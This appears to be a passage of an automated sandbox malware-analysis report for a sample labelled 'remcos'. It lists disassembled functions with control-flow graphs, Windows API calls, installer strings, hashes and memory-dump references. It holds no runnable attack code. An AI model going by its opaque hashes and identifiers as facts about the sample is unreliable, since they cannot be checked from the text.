                                                                                                                                • String ID: /l*$/qb!- REBOOTPROMPT=S$/qn$MSIPATCHREMOVE=$OLEAUT32.dll$OpenProcessToken failed with %d$PATCH=$REBOOT=Force$REBOOT=ReallySuppress$REBOOTPROMPT=""$RUVEH?IJDqXFAtPYZlgmnc$ServerMain (CA): Access to token failed$ServerMain (CA): CoInitializeSecurity failed$ServerMain (CA): Connect to remote object failed.$ServerMain (CA): Connection to Service failed.$ServerMain (CA): Could not open synchronization handle.$ServerMain (CA): Create Custom Action Server failed.$ServerMain (CA): Error: Access to SD$ServerMain (CA): Error: Format SD$ServerMain (CA): Error: Watch for change-of-owning-process signal$ServerMain (CA): Error: Watch for the shutdown signal$ServerMain (CA): Error: icacContext in CA server should be AISImpersonated but is not any impersonated type$ServerMain (CA): Error: icacContext in CA server should be EEUI but is not any impersonated type$ServerMain (CA): Impersonation token not saved.$ServerMain (CA): Open synchronization event failed$ServerMain (CA): Parsing command line failed$ServerMain (CA): Process not registered with service.$ServerMain (CA): Wait on synchronization event failed$ServerMain (CA): Wrong command line$Software\Microsoft\Windows\CurrentVersion\Installer\RunOnceEntries$forcerestart$help$log$norestart$package$passive$promptrestart$q$quiet$uninstall$update
                                                                                                                                • API String ID: 1475639937-2370891382
                                                                                                                                • Opcode ID: 83b2b6caea27f2f061287540e7c410472be1c0917a75a655cd41ccd1bd55b8ea
                                                                                                                                • Instruction ID: 5daa9f4c8cb342cb3af10ffb15510f9533269a224adada198fd23f6d8965255f
                                                                                                                                • Opcode Fuzzy Hash: 83b2b6caea27f2f061287540e7c410472be1c0917a75a655cd41ccd1bd55b8ea
                                                                                                                                • Instruction Fuzzy Hash: 84E2AC7150834ADFD720DF24D944BBEB7E5FB88314F14492EF689972A0EB709886CB52
                                                                                                                                Function 001F8ADC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35librarysleeploaderCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 673 1f8adc-1f8ae4 674 1f8aee-1f8af6 673->674 675 1f8af8-1f8b05 674->675 676 1f8ae6-1f8ae8 Sleep 674->676 677 1f8b07-1f8b09 675->677 678 1f8b24-1f8b26 675->678 676->674 679 1f8b0b-1f8b1d LoadLibraryW 677->679 680 1f8b28-1f8b3b GetProcAddress 677->680 678->680 681 1f8b3d-1f8b42 678->681 679->680 683 1f8b1f 679->683 680->681 682 1f8b47-1f8b4e 680->682 681->682 683->678
                                                                                                                                APIs
                                                                                                                                • Sleep.KERNEL32(0000000A,?,001F8B8F,?,?), ref: 001F8AE8
                                                                                                                                • LoadLibraryW.KERNELBASE(COMCTL32,001F8B8F,?,?), ref: 001F8B10
                                                                                                                                • GetProcAddress.KERNEL32(?,InitCommonControlsEx), ref: 001F8B2E
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressLibraryLoadProcSleep
                                                                                                                                • String ID: COMCTL32$InitCommonControlsEx
                                                                                                                                • API String ID: 188063004-472741233
                                                                                                                                • Opcode ID: ce6bfa679210a256ed3d808f3c58b978a48d168dc64a3ab30d5c28842cd5a094
                                                                                                                                • Instruction ID: 696ad227ffb1fc8550326a2360d8cd8e8a270c258caebae13c6c79d7d12ed525
                                                                                                                                • Opcode Fuzzy Hash: ce6bfa679210a256ed3d808f3c58b978a48d168dc64a3ab30d5c28842cd5a094
                                                                                                                                • Instruction Fuzzy Hash: 9BF09A7164424E9BD7129B75AE58B3B7AF5FBA5345F080432EA00D6AA0EF30C482DB90
                                                                                                                                Function 001F9330 Relevance: 13.6, APIs: 9, Instructions: 144sleepCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 544 1f9330-1f9361 call 1f9e35 call 1f9ee8 GetStartupInfoW 550 1f9363-1f9372 544->550 551 1f938c-1f938e 550->551 552 1f9374-1f9376 550->552 555 1f938f-1f9395 551->555 553 1f937f-1f938a Sleep 552->553 554 1f9378-1f937d 552->554 553->550 554->555 556 1f9397-1f939f _amsg_exit 555->556 557 1f93a1-1f93a7 555->557 558 1f93db-1f93e1 556->558 559 1f93a9-1f93c2 call 1f9519 557->559 560 1f93d5 557->560 562 1f93fe-1f9400 558->562 563 1f93e3-1f93f4 _initterm 558->563 559->558 569 1f93c4-1f93d0 559->569 560->558 565 1f940b-1f9412 562->565 566 1f9402-1f9409 562->566 563->562 567 1f9437-1f9441 565->567 568 1f9414-1f9421 call 1f9d40 565->568 566->565 571 1f9444-1f9449 567->571 568->567 576 1f9423-1f9435 568->576 572 1f9509-1f9518 569->572 574 1f944b-1f944d 571->574 575 1f9495-1f9498 571->575 579 1f944f-1f9451 574->579 580 1f9464-1f9468 574->580 577 1f949a-1f94a3 575->577 578 1f94a6-1f94b3 _ismbblead 575->578 576->567 577->578 581 1f94b9-1f94bd 578->581 582 1f94b5-1f94b6 578->582 579->575 583 1f9453-1f9455 579->583 584 1f946a-1f946e 580->584 585 1f9470-1f9472 580->585 581->571 582->581 583->580 588 1f9457-1f945a 583->588 586 1f9473-1f947b call 1f7d41 584->586 585->586 591 1f9480-1f948c 586->591 588->580 590 1f945c-1f9462 588->590 590->583 592 1f94ee-1f94f5 591->592 593 1f948e-1f948f exit 591->593 594 1f94f7-1f94fd _cexit 592->594 595 1f9502 592->595 593->575 594->595 595->572
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 001F9E35: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 001F9E62
                                                                                                                                  • Part of subcall function 001F9E35: GetCurrentProcessId.KERNEL32 ref: 001F9E71
                                                                                                                                  • Part of subcall function 001F9E35: GetCurrentThreadId.KERNEL32 ref: 001F9E7A
                                                                                                                                  • Part of subcall function 001F9E35: GetTickCount.KERNEL32 ref: 001F9E83
                                                                                                                                  • Part of subcall function 001F9E35: QueryPerformanceCounter.KERNEL32(?), ref: 001F9E98
                                                                                                                                • GetStartupInfoW.KERNEL32(?,001FA310,00000058), ref: 001F934F
                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 001F9384
                                                                                                                                • _amsg_exit.MSVCRT ref: 001F9399
                                                                                                                                • _initterm.MSVCRT ref: 001F93ED
                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 001F9419
                                                                                                                                • exit.MSVCRT ref: 001F948F
                                                                                                                                • _ismbblead.MSVCRT ref: 001F94AA
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 836923961-0
                                                                                                                                • Opcode ID: 561766947b446bf8a71d6af851b2debe394f2ffe87521e7abf37bcddee7e74b7
                                                                                                                                • Instruction ID: eb160319ccf7491ad0a33f345b87bc9f2e38ee415372be51056419a1d1e226b7
                                                                                                                                • Opcode Fuzzy Hash: 561766947b446bf8a71d6af851b2debe394f2ffe87521e7abf37bcddee7e74b7
                                                                                                                                • Instruction Fuzzy Hash: 6B41147194431DDFDB25BFA4EA147B9B7A5FB54720F20001AEB42D76D1CB704882DB80
                                                                                                                                Function 001F915B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 100libraryloaderCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 596 1f915b-1f9194 call 1f90e9 599 1f9196-1f91bf LdrResolveDelayLoadedAPI 596->599 600 1f91c4-1f91d8 596->600 608 1f9267-1f926b 599->608 601 1f91dd-1f91df 600->601 602 1f91da 600->602 604 1f924d-1f9256 GetProcAddress 601->604 605 1f91e1-1f91ee LoadLibraryExA 601->605 602->601 606 1f925f-1f9261 DelayLoadFailureHook 604->606 607 1f9258-1f925d 604->607 605->606 609 1f91f0-1f9200 605->609 606->608 607->608 610 1f9202-1f922b 609->610 611 1f9240-1f9246 FreeLibrary 609->611 612 1f922d-1f923e 610->612 613 1f9249-1f924b 610->613 611->613 612->613 613->604 613->606
                                                                                                                                APIs
                                                                                                                                • LdrResolveDelayLoadedAPI.NTDLL ref: 001F91BD
                                                                                                                                • LoadLibraryExA.KERNEL32(?), ref: 001F91E4
                                                                                                                                • GetProcAddress.KERNEL32(?,?), ref: 001F924F
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressDelayLibraryLoadLoadedProcResolve
                                                                                                                                • String ID: $
                                                                                                                                • API String ID: 570722585-3993045852
                                                                                                                                • Opcode ID: 1afb57c27087c4580a9c40c05ad3ba46ab3391dbd2b986d4936306047dca67a0
                                                                                                                                • Instruction ID: 036f8c05a17cd0580fa1a669623fdc32288e277d97687670b14a3fe5a4b47cb4
                                                                                                                                • Opcode Fuzzy Hash: 1afb57c27087c4580a9c40c05ad3ba46ab3391dbd2b986d4936306047dca67a0
                                                                                                                                • Instruction Fuzzy Hash: F831A171A00219AFCB05EFA9DC44BBEBBF5EF48754F148069E909E7251DB309D41CB90
                                                                                                                                Function 001F43A0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 187memoryCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 616 1f43a0-1f43ea call 1fa18c call 1f878a 621 1f45aa-1f45d4 call 1f87d4 * 2 616->621 622 1f43f0-1f43ff call 1f878a 616->622 622->621 628 1f4405-1f4444 call 1f878a 622->628 633 1f459f-1f45a5 call 1f87d4 628->633 634 1f444a-1f445f GetModuleFileNameW 628->634 633->621 634->633 635 1f4465-1f44c8 call 1f8c90 634->635 635->633 640 1f44ce-1f44db 635->640 641 1f44dd-1f44f4 GlobalAlloc 640->641 642 1f44f6-1f44f9 640->642 643 1f44ff-1f4501 641->643 642->643 644 1f4658-1f465a 643->644 645 1f4507-1f450c 643->645 648 1f4596-1f459c 644->648 649 1f4660-1f4661 644->649 646 1f450e-1f4515 GlobalFree 645->646 647 1f451b-1f4541 call 1f8cd0 645->647 646->647 653 1f4547-1f456f 647->653 654 1f45d5-1f45d7 647->654 648->633 650 1f4590 GlobalFree 649->650 650->648 660 1f4588-1f458b 653->660 664 1f4571-1f4578 653->664 655 1f45d9-1f45fe call 1f2e35 654->655 655->660 661 1f4600-1f462b call 1f2e35 655->661 660->648 663 1f458d 660->663 667 1f462d-1f4637 661->667 668 1f4639-1f463b 661->668 663->650 664->660 665 1f457a-1f4586 664->665 665->655 667->668 669 1f463c-1f4653 667->669 668->669 669->660
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 001F878A: GlobalAlloc.KERNEL32(00000040,00000000,00000000,00000001,00000000,?,001F5E28,00000100), ref: 001F87A2
                                                                                                                                  • Part of subcall function 001F878A: GlobalFree.KERNEL32(?), ref: 001F87C0
                                                                                                                                • GetModuleFileNameW.KERNEL32(?,00000104,00000104,?,?,00001388,?,001FA2B0,000000A8,001F6E7E,00000000,00000000,?), ref: 001F4457
                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00000000,?,?,00001388,?,001FA2B0,000000A8,001F6E7E,00000000,00000000,?), ref: 001F44E0
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 001F450F
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 001F4590
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Global$Free$Alloc$FileModuleName
                                                                                                                                • String ID: %d.%d.%.4d.%d
                                                                                                                                • API String ID: 906160587-3399825337
                                                                                                                                • Opcode ID: 44b372ef6cb6023f0bf35e2cda1a85bbc4e1e6b4ef876f8f26a0bb2d7c1aca5c
                                                                                                                                • Instruction ID: 5a501b10036aff6e55fea1391b34e34b72107ad4f1f8f4a2eea6a13046d56b76
                                                                                                                                • Opcode Fuzzy Hash: 44b372ef6cb6023f0bf35e2cda1a85bbc4e1e6b4ef876f8f26a0bb2d7c1aca5c
                                                                                                                                • Instruction Fuzzy Hash: 5A7168B5A0032C9FDB24DB64DD45BBEBBB9EF45310F1041A9AA49A32A1DB304E84CF11
                                                                                                                                Function 001F44A9 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 124memoryCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 684 1f44a9-1f44c8 686 1f459f-1f45d4 call 1f87d4 * 3 684->686 687 1f44ce-1f44db 684->687 688 1f44dd-1f44f4 GlobalAlloc 687->688 689 1f44f6-1f44f9 687->689 691 1f44ff-1f4501 688->691 689->691 693 1f4658-1f465a 691->693 694 1f4507-1f450c 691->694 699 1f4596-1f459c 693->699 700 1f4660-1f4661 693->700 696 1f450e-1f4515 GlobalFree 694->696 697 1f451b-1f4541 call 1f8cd0 694->697 696->697 706 1f4547-1f456f 697->706 707 1f45d5-1f45d7 697->707 699->686 702 1f4590 GlobalFree 700->702 702->699 713 1f4588-1f458b 706->713 717 1f4571-1f4578 706->717 708 1f45d9-1f45fe call 1f2e35 707->708 708->713 714 1f4600-1f462b call 1f2e35 708->714 713->699 716 1f458d 713->716 720 1f462d-1f4637 714->720 721 1f4639-1f463b 714->721 716->702 717->713 718 1f457a-1f4586 717->718 718->708 720->721 722 1f463c-1f4653 720->722 721->722 722->713
                                                                                                                                APIs
                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00000000,?,?,00001388,?,001FA2B0,000000A8,001F6E7E,00000000,00000000,?), ref: 001F44E0
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 001F450F
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 001F4590
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Global$Free$Alloc
                                                                                                                                • String ID: %d.%d.%.4d.%d
                                                                                                                                • API String ID: 1780285237-3399825337
                                                                                                                                • Opcode ID: edda84bd06cd8b3f087cefca05fa5a868b3fccf606c8c18090eb6de6e9499a93
                                                                                                                                • Instruction ID: a032b32ab2e23c6c258cab7c2ab4d6c4d5fcfb68a599f0b157caa6b31670c3c5
                                                                                                                                • Opcode Fuzzy Hash: edda84bd06cd8b3f087cefca05fa5a868b3fccf606c8c18090eb6de6e9499a93
                                                                                                                                • Instruction Fuzzy Hash: 99414A71E0022C9FDB24DB65CD45BBEBBB9EF44310F2041A9E649A72A1DB305E85CF50
                                                                                                                                Function 001F8BFD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52sleeplibraryloaderCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 725 1f8bfd-1f8c19 726 1f8c1b 725->726 727 1f8c32-1f8c3e 725->727 730 1f8c1d-1f8c2d Sleep 726->730 728 1f8c60-1f8c64 727->728 729 1f8c40-1f8c42 727->729 732 1f8c76-1f8c82 728->732 733 1f8c66-1f8c72 GetProcAddress 728->733 729->728 731 1f8c44-1f8c49 call 1f908c 729->731 730->730 734 1f8c2f 730->734 737 1f8c4e-1f8c5a 731->737 733->732 736 1f8c74 733->736 734->727 736->732 737->728
                                                                                                                                APIs
                                                                                                                                • Sleep.KERNEL32(0000000A), ref: 001F8C1F
                                                                                                                                • GetProcAddress.KERNEL32(?), ref: 001F8C68
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressProcSleep
                                                                                                                                • String ID: VERSION
                                                                                                                                • API String ID: 1175476452-2153328089
                                                                                                                                • Opcode ID: 6a2794e342263911099ff3fe28ed917754658d568faeac785e6d89d25beb152f
                                                                                                                                • Instruction ID: bd036e6cc41c808c6d8470f1c999d01ea8c4646e0f7bf8a3e93ab24c6bf9007e
                                                                                                                                • Opcode Fuzzy Hash: 6a2794e342263911099ff3fe28ed917754658d568faeac785e6d89d25beb152f
                                                                                                                                • Instruction Fuzzy Hash: 9B01B1716052199FDB189B35DE196BE7AA9DB81360F08043EE645E7250EF70DC81C7E0
                                                                                                                                Function 001F8CD0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 752 1f8cd0-1f8ce6 call 1f8bfd 755 1f8d08 752->755 756 1f8ce8-1f8d06 GetFileVersionInfoW 752->756 757 1f8d0a-1f8d0b 755->757 756->757
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 001F8BFD: Sleep.KERNEL32(0000000A), ref: 001F8C1F
                                                                                                                                  • Part of subcall function 001F8BFD: GetProcAddress.KERNEL32(?), ref: 001F8C68
                                                                                                                                • GetFileVersionInfoW.KERNELBASE ref: 001F8D03
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressFileInfoProcSleepVersion
                                                                                                                                • String ID: GetFileVersionInfoW
                                                                                                                                • API String ID: 3824450226-2839375084
                                                                                                                                • Opcode ID: 3bc41197fd92aa0920ab359d1b998fb9103247bc8f5877da50423dda73d4040a
                                                                                                                                • Instruction ID: 1343e40a60192fe8de26468b7e2278a0b885f7e436bd26ac53e6ff7982488ffd
                                                                                                                                • Opcode Fuzzy Hash: 3bc41197fd92aa0920ab359d1b998fb9103247bc8f5877da50423dda73d4040a
                                                                                                                                • Instruction Fuzzy Hash: 03E0E63624411DA78F155F95DD0497B7F66EF94350B044421FA1A52560DF31DC21E7E4
                                                                                                                                Function 001F7D41 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 738 1f7d41-1f7d7a call 1f9ee8 call 1f7d1b 750 1f7d7a call 1f8adc 738->750 751 1f7d7a call 1f8b80 738->751 744 1f7d7c-1f7dc9 call 1f63e3 call 1f8f5a ExitProcess 750->744 751->744
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 001F7D1B: SetProcessMitigationPolicy.KERNEL32(00000000,?,00000008,?,?,?,001F7D64,001FA2D0,00000024,001F9480,001F0000,00000000,00000002,0000000A), ref: 001F7D39
                                                                                                                                  • Part of subcall function 001F63E3: GetVersionExW.KERNEL32(?), ref: 001F6434
                                                                                                                                  • Part of subcall function 001F63E3: GetCurrentProcess.KERNEL32(0000001A,?,00000004,00000000), ref: 001F6456
                                                                                                                                  • Part of subcall function 001F63E3: NtQueryInformationProcess.NTDLL ref: 001F645D
                                                                                                                                  • Part of subcall function 001F63E3: GetCommandLineW.KERNEL32 ref: 001F649F
                                                                                                                                  • Part of subcall function 001F63E3: GetStdHandle.KERNEL32(000000F5), ref: 001F64F3
                                                                                                                                  • Part of subcall function 001F63E3: GetFileType.KERNEL32(00000000), ref: 001F6504
                                                                                                                                  • Part of subcall function 001F63E3: memset.MSVCRT ref: 001F652B
                                                                                                                                  • Part of subcall function 001F63E3: memset.MSVCRT ref: 001F653D
                                                                                                                                • ExitProcess.KERNEL32 ref: 001F7DC9
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Process$memset$CommandCurrentExitFileHandleInformationLineMitigationPolicyQueryTypeVersion
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3041573362-3916222277
                                                                                                                                • Opcode ID: ec23cdebf7389f6cda0929e584395cf2743fc92962aa645a960f78f9636279e5
                                                                                                                                • Instruction ID: 693b214b866d94b9ba289267499682940fa03585d0b908d35de8240ec1558993
                                                                                                                                • Opcode Fuzzy Hash: ec23cdebf7389f6cda0929e584395cf2743fc92962aa645a960f78f9636279e5
                                                                                                                                • Instruction Fuzzy Hash: 86F0F87191620CABDB00EFA0D9497FC7AB5BF18311F604044E20576191CB750E04DB61
                                                                                                                                Function 001F8C90 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 759 1f8c90-1f8ca6 call 1f8bfd 762 1f8ca8-1f8cc0 GetFileVersionInfoSizeW 759->762 763 1f8cc2 759->763 764 1f8cc4-1f8cc5 762->764 763->764
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 001F8BFD: Sleep.KERNEL32(0000000A), ref: 001F8C1F
                                                                                                                                  • Part of subcall function 001F8BFD: GetProcAddress.KERNEL32(?), ref: 001F8C68
                                                                                                                                • GetFileVersionInfoSizeW.KERNELBASE ref: 001F8CBD
                                                                                                                                Strings
                                                                                                                                • GetFileVersionInfoSizeW, xrefs: 001F8C9A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressFileInfoProcSizeSleepVersion
                                                                                                                                • String ID: GetFileVersionInfoSizeW
                                                                                                                                • API String ID: 1244426142-1049618512
                                                                                                                                • Opcode ID: a91ce848c837343a51f7afe7ba692bc358f8839c6cd335b6fca7c7d4ec60d840
                                                                                                                                • Instruction ID: e5cde0878b66c8a5cc7e38f31f6a3cf9e2250e33dc3d031765fc6c50112cf531
                                                                                                                                • Opcode Fuzzy Hash: a91ce848c837343a51f7afe7ba692bc358f8839c6cd335b6fca7c7d4ec60d840
                                                                                                                                • Instruction Fuzzy Hash: F2D05E3570421C678B146BA1ED048BB7F6AEB95360B148031FE19A37A0CF31ED51E7E0
                                                                                                                                Function 001F908C Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 766 1f908c-1f90ca memset call 1f9002 769 1f90cc-1f90d9 LoadLibraryW 766->769 770 1f90db 766->770 771 1f90dd-1f90e8 call 1f95e0 769->771 770->771
                                                                                                                                APIs
                                                                                                                                • memset.MSVCRT ref: 001F90B2
                                                                                                                                  • Part of subcall function 001F9002: lstrlenW.KERNEL32(OLEAUT32.dll,00000000,OLEAUT32.dll,00000000,001F90C6,0000020A,?), ref: 001F9019
                                                                                                                                • LoadLibraryW.KERNELBASE(?), ref: 001F90D3
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: LibraryLoadlstrlenmemset
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3555077121-0
                                                                                                                                • Opcode ID: aed62fcaef0f2aa601c44456db1b437b500854a103f82ce82cb2eb3ed4cc3319
                                                                                                                                • Instruction ID: c6627272e00d985547b2a9579b8ed7959aad5881dfdc75bb2f04fedf76814a8f
                                                                                                                                • Opcode Fuzzy Hash: aed62fcaef0f2aa601c44456db1b437b500854a103f82ce82cb2eb3ed4cc3319
                                                                                                                                • Instruction Fuzzy Hash: CCF0273160430C9BCB24FB34D84EBFE37A8AB18300F50049AF51A971C0EFB0AE88C990
                                                                                                                                Function 001F7D1B Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
